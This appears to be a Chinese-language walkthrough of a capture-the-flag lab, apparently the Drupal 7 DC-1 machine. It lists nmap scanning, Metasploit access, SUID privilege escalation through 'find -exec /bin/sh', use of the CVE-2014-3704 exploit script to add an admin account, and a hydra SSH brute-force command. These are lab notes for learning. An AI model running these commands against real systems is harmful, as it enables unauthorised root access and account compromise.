1.nmap -sP 192.168.0.100/24 使用nmap探测主机ip,经过排除我的靶机ip为192.168.0.119
2.nmap -A -p 1-65535 192.168.0.119 探测端口开放
3.访问该ip/robots.txt和UPGRADE.txt,在UPGRADE.txt发现是7.0版本,应该不是最新版本
4.用msf攻击一下,获取权限
5.shell
python -c "import pty;pty.spawn('/bin/bash')"使用交互shell
6.find / -user root -perm -4000 -print 2>/dev/null 这里利用SUID提权;查看具有SUID的二进制可执行文件
注:1.Nmap/Vim/find/Bash/More/Less/Nano/cp这几个是已知的可用来提权的linux可执行的文件
2.find / -name cron.php -exec "/bin/sh" \; 利用find获取root权限shell
7.在flag1中提示看配置文件,百度drupal数据库配置文件,发现位置在/sites/default/srttings.php
8.看配置文件,这里找到了flag2,这里找到了mysql的username、passwd;
9.进入数据库,发现users表,尝试md5破解密码失败,search -f *pass* 看看有没有提示
10.不会用,https://www.exploit-db.com/exploits/34992,这个版本的具有漏洞,使用别人写好的cve-2014-3704,可以任意增加管理员账户
11.python 34992.py -t http://192.168.0.103 -u 123456 -p 123456
12.登录获取flag3 或者/find / -name *flag*
13.参照其他博客flag4藏在/etc/passwd是个用户名 ,之前ip端口扫描开放22端口现在有思路了
14.使用hydar进行服务密码爆破
hydra -l flag4 -P /usr/share/john/password.lst 192.168.0.103 ssh -vV -f
- -l指定用户名
- -P指定密码字典文件
- -vV爆破一次在终端打印一行
- -f成功爆破密码后,停止爆破
- -P指定密码文件
- -p指定密码
15.爆破出来flag4:orange
16.ls 发现flag4,并提示最终flag在root的家目录下
17.查看最终thefinalflag.txt
做得好!!!!
希望你喜欢这个,并学到了一些新的技能。
你可以告诉我你对这次小旅行的看法
通过Twitter与我联系-@DCAU7
收获:1.SUID提权
2.火狐插件wappalyzer,用来探测网站信息
Comments NOTHING